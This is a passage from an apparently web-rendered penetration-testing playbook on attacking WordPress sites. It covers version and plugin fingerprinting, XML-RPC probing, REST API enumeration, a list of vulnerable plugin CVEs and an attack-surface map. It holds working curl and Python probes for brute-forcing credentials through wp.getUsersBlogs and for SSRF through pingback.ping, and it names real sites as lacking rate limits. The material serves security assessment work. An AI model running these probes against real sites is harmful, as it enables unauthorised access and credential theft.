&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/?author=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;location&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Readme (exact version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/readme.html&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="72-xml-rpc--the-most-dangerous-wordpress-attack-surface" &gt;
&lt;div&gt;
&lt;a href="#72-xml-rpc--the-most-dangerous-wordpress-attack-surface"&gt;
##
&lt;/a&gt;
7.2 XML-RPC — The Most Dangerous WordPress Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
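&lt;p&gt;Before the XML-RPC material, an added worked version of the 7.1 fingerprinting greps (example code, not the playbook&amp;rsquo;s): it pulls the core version from the generator tag, every plugin and theme slug from &lt;code&gt;wp-content/&lt;/code&gt; asset URLs, and the &lt;code&gt;?ver=&lt;/code&gt; values attached to them. The caveat it encodes: when a plugin enqueues an asset without a version, WordPress appends its own version, so a &lt;code&gt;?ver=&lt;/code&gt; equal to the core version says nothing about the plugin and should be confirmed against &lt;code&gt;/wp-content/plugins/&amp;lt;slug&amp;gt;/readme.txt&lt;/code&gt; (&lt;code&gt;Stable tag:&lt;/code&gt;). The HTML page and readme are constructed; the slugs are real plugin names, the version numbers are made up.&lt;/p&gt;

```python
import re
import urllib.parse

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([0-9.]+)', re.I)
ASSET_RE = re.compile(r'/wp-content/(plugins|themes)/([A-Za-z0-9_.\-]+)/([^"\'\s>]*)', re.I)
STABLE_TAG_RE = re.compile(r'^Stable tag:\s*(\S+)', re.I | re.M)


def fingerprint_wordpress(html):
    """Core version from the generator tag plus every plugin/theme slug seen in asset URLs,
    each with the set of ?ver= values attached to its assets."""
    result = {"core": None, "plugins": {}, "themes": {}}
    match = GENERATOR_RE.search(html)
    if match:
        result["core"] = match.group(1)
    for kind, slug, rest in ASSET_RE.findall(html):
        versions = result[kind.lower()].setdefault(slug, set())
        query = urllib.parse.urlsplit("/" + rest).query
        for ver in urllib.parse.parse_qs(query).get("ver", []):
            versions.add(ver)
    return result


def unreliable_versions(fp):
    """Slugs whose only ?ver= equals the core version: WordPress appends its own version when the
    plugin registered the asset without one, so this is not the plugin's version. Confirm against
    /wp-content/plugins/<slug>/readme.txt instead."""
    flagged = set()
    for kind in ("plugins", "themes"):
        for slug, versions in fp[kind].items():
            if fp["core"] and versions == {fp["core"]}:
                flagged.add(slug)
    return flagged


def stable_tag(readme_txt):
    """Plugin version declared in readme.txt (Stable tag: x.y.z), or None."""
    match = STABLE_TAG_RE.search(readme_txt)
    return match.group(1) if match else None


# Constructed page and readme; slugs are real plugin names, the versions are made up.
SAMPLE_HTML = '''<html><head>
<meta name="generator" content="WordPress 6.4.3" />
<link rel="stylesheet" href="https://target.example/wp-content/themes/astra/style.css?ver=4.6.2" />
<script src="https://target.example/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.6"></script>
<script src="https://target.example/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.18.3"></script>
<link href="/wp-content/plugins/some-legacy-plugin/css/style.css?ver=6.4.3" />
</head><body></body></html>'''
SAMPLE_README = "=== Contact Form 7 ===\nRequires at least: 6.2\nStable tag: 5.8.6\nLicense: GPLv2\n"

if __name__ == "__main__":
    fp = fingerprint_wordpress(SAMPLE_HTML)
    print(fp)
    print("confirm via readme.txt:", unreliable_versions(fp))
    print("contact-form-7 readme says:", stable_tag(SAMPLE_README))
```

Feed `fingerprint_wordpress` the HTML of a few pages rather than only the homepage; plugins that load assets only on forms, checkout or login pages never show up on the front page.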
&lt;p&gt;XML-RPC is enabled by default and, when left exposed, is a large attack surface: credential testing outside &lt;code&gt;wp-login.php&lt;/code&gt;, request amplification through &lt;code&gt;system.multicall&lt;/code&gt;, and blind SSRF through &lt;code&gt;pingback.ping&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if active&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List ALL available methods (80+ on real sites)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Credential brute force via wp.getUsersBlogs (UNLIMITED if no rate limit)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;admin&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;PASSWORD&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SSRF via pingback.ping (reach internal network)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;pingback.ping&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;http://INTERNAL_IP:PORT/&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;https://target.com/post&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government transparency portal — XML-RPC active with 80 methods, no rate limiting.
&lt;code&gt;wp.getUsersBlogs&lt;/code&gt; allowed unlimited brute force to test admin credentials.&lt;/p&gt;
&lt;h4 id="xmlrpc-blocked-by-sso--how-to-identify" &gt;
&lt;div&gt;
&lt;a href="#xmlrpc-blocked-by-sso--how-to-identify"&gt;
###
&lt;/a&gt;
XMLRPC Blocked by SSO — How to Identify
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When WordPress is behind a corporate SSO (SimpleSAMLphp, ADFS, etc.), XMLRPC may respond with HTML instead of XML:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Symptom: ALL auth attempts return HTML with login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods that do NOT require auth (system.listMethods, demo.sayHello, pingback.ping)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# still work and return normal XML!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# How to confirm:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Test method without auth (works → XMLRPC active)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test method with auth (returns HTML login → SSO intercepting)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check SSO redirect in response (Location header)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xml &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;demo.sayHello&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(&lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt;, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;xml,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;text/xml&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;&amp;lt;methodResponse&amp;gt;&amp;lt;params&amp;gt;&amp;lt;param&amp;gt;...&amp;#34; → WORKS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xml_auth &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#39;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;admin&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;test&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(&lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt;, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;xml_auth,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;text/xml&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;&amp;lt;!DOCTYPE html&amp;gt;&amp;lt;html&amp;gt;...&amp;#34; → SSO HTML! Auth intercepted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Even when blocked, we can still:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Enumerate all 79+ methods (system.listMethods)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Test SSRF via pingback.ping (works without auth!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Identify WordPress version via system.getCapabilities&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mpf.gob.ar&lt;/code&gt; — 79 active XMLRPC methods. &lt;code&gt;demo.sayHello&lt;/code&gt; and &lt;code&gt;pingback.ping&lt;/code&gt; work without auth. &lt;code&gt;wp.getUsersBlogs&lt;/code&gt; returns the SSO redirect, so the login path is intercepted upstream while the unauthenticated methods still reach WordPress. No rate limiting detected.&lt;/p&gt;
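&lt;p&gt;Added example (not the playbook&amp;rsquo;s own code): offline helpers for the &lt;code&gt;xmlrpc.php&lt;/code&gt; probes above, using only the stdlib &lt;code&gt;xmlrpc.client&lt;/code&gt;. It builds the request bodies, tells a real &lt;code&gt;methodResponse&lt;/code&gt; from a &lt;code&gt;fault&lt;/code&gt; and from the SSO/WAF HTML that means the call never reached WordPress, and reduces a &lt;code&gt;system.listMethods&lt;/code&gt; result to the facts a report needs (method count, &lt;code&gt;system.multicall&lt;/code&gt; present, &lt;code&gt;pingback.ping&lt;/code&gt; present). The sample replies are constructed for the example, not captured from any target.&lt;/p&gt;

```python
"""Offline helpers for WordPress xmlrpc.php triage (added example, not the playbook's code).

Builds request bodies with the stdlib xmlrpc.client and classifies the three kinds of
reply seen in the field: a real <methodResponse>, a <fault>, or an HTML page (SSO
redirect / WAF block) meaning the call never reached WordPress. Samples are constructed.
"""
import xmlrpc.client
from typing import Any

SSRF_METHODS = {"pingback.ping", "pingback.extensions.getPingbacks"}
AMPLIFIER = "system.multicall"  # batches many wp.getUsersBlogs calls into one request


def build_call(method: str, *params: Any) -> bytes:
    """Serialize an XML-RPC methodCall; POST it with Content-Type: text/xml."""
    return xmlrpc.client.dumps(params, methodname=method).encode()


def build_multicall_probe() -> bytes:
    """system.multicall carrying two harmless calls. A <methodResponse> (not a fault)
    proves multicall is enabled, which is what makes xmlrpc brute force 'unlimited'."""
    calls = [
        {"methodName": "demo.sayHello", "params": []},
        {"methodName": "system.getCapabilities", "params": []},
    ]
    return build_call(AMPLIFIER, calls)


def classify_response(body: str) -> dict:
    """Return {'kind': 'ok'|'fault'|'intercepted', ...} for a raw xmlrpc.php reply."""
    if "<methodResponse" not in body:
        # HTML (SSO login page, WAF block) or empty body: intercepted upstream
        return {"kind": "intercepted", "preview": body.strip()[:40]}
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as f:
        return {"kind": "fault", "code": f.faultCode, "message": f.faultString}
    return {"kind": "ok", "value": params[0] if params else None}


def exposure_summary(methods: list[str]) -> dict:
    """Turn a system.listMethods result into the findings a report needs."""
    return {
        "method_count": len(methods),
        "multicall": AMPLIFIER in methods,
        "ssrf_vector": sorted(SSRF_METHODS & set(methods)),
        "unauth_probe": "demo.sayHello" in methods,
    }


# Constructed sample replies, shaped like what the requests/curl calls above return
SAMPLE_LIST = xmlrpc.client.dumps(
    (["system.multicall", "system.listMethods", "system.getCapabilities",
      "demo.sayHello", "pingback.ping", "wp.getUsersBlogs"],),
    methodresponse=True)
SAMPLE_FAULT = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."))
SAMPLE_SSO = "<!DOCTYPE html><html><head><title>Sign in</title></head></html>"

if __name__ == "__main__":
    print(build_call("wp.getUsersBlogs", "admin", "test").decode())
    listing = classify_response(SAMPLE_LIST)
    print(listing)
    print(exposure_summary(listing["value"]))
    print(classify_response(SAMPLE_FAULT))
    print(classify_response(SAMPLE_SSO))
```

&lt;p&gt;The multicall probe is the check worth running before anything else: a &lt;code&gt;methodResponse&lt;/code&gt; rather than a fault means the endpoint will accept hundreds of &lt;code&gt;wp.getUsersBlogs&lt;/code&gt; attempts in a single request, while an &lt;code&gt;intercepted&lt;/code&gt; result for the authenticated method but &lt;code&gt;ok&lt;/code&gt; for &lt;code&gt;system.listMethods&lt;/code&gt; reproduces exactly the SSO split seen in the case above.&lt;/p&gt;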
&lt;h3 id="73-rest-api-endpoints" &gt;
&lt;div&gt;
&lt;a href="#73-rest-api-endpoints"&gt;
##
&lt;/a&gt;
7.3 REST API Endpoints
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Exposed namespaces&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.namespaces&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List pages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/pages?per_page=100&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {id,slug,link}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List posts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/posts?per_page=100&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List media (documents, PDFs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/media?per_page=100&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {id,title:.title.rendered,url:.source_url}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Page revisions (full history). Stock WordPress requires edit rights on the parent post here, so expect 401 unauthenticated; an anonymous 200 is itself a misconfiguration worth reporting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/pages/{id}/revisions&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Custom post types&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/types&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Taxonomies&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/taxonomies&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="74-vulnerable-plugins-common-cves" &gt;
&lt;div&gt;
&lt;a href="#74-vulnerable-plugins-common-cves"&gt;
##
&lt;/a&gt;
7.4 Vulnerable Plugins (common CVEs)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;WPDM (Download Manager) &amp;lt; 3.3.00 → CVE-2023-49753 SQLi
WPDM &amp;lt; 3.2.00 → CVE-2021-25069 unauthenticated download
WPDM &amp;lt; 3.2.10 → CVE-2021-34639 authenticated file upload
Contact Form 7 &amp;lt; 5.6 → file upload bypass
Yoast SEO → sitemaps, XML-RPC endpoints
WP Super Cache → exposed debug log
GSpeech → CVE-2025-10187 (old versions)
Revslider → dozens of file upload CVEs
Ninja Forms → file upload, XSS
Popup Maker → XSS, redirect
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="75-wordpress-attack-surface-map" &gt;
&lt;div&gt;
&lt;a href="#75-wordpress-attack-surface-map"&gt;
##
&lt;/a&gt;
7.5 WordPress Attack Surface Map
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;WordPress Attack Surface:
1. wp-login.php → Brute force, user enumeration
2. xmlrpc.php (if 200) → Brute force amplified via system.multicall (hundreds of logins per request), SSRF via pingback.ping
3. /wp-json/wp/v2/users → User enumeration
4. /wp-json/wp/v2/pages → Page content
5. /wp-json/wp/v2/media → Media and documents
6. /wp-json/wp/v2/pages/{id}/revisions → History (deleted data!); needs edit rights on stock WP, so an anonymous 200 is a misconfiguration
7. /wp-json/wp-site-health/v1 → Diagnostic info
8. /wp-admin/admin-ajax.php → AJAX calls (sometimes without nonce)
9. /?author=1 → User ID enumeration
10. /wp-content/plugins/* → Plugin identification
11. /wp-content/uploads/* → Uploaded files
12. wp-comments-post.php → Comments (spam, XSS)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="8-laravel-spring-boot-aspnet-exchange--other-frameworks" &gt;
&lt;div&gt;
&lt;a href="#8-laravel-spring-boot-aspnet-exchange--other-frameworks"&gt;
#
&lt;/a&gt;
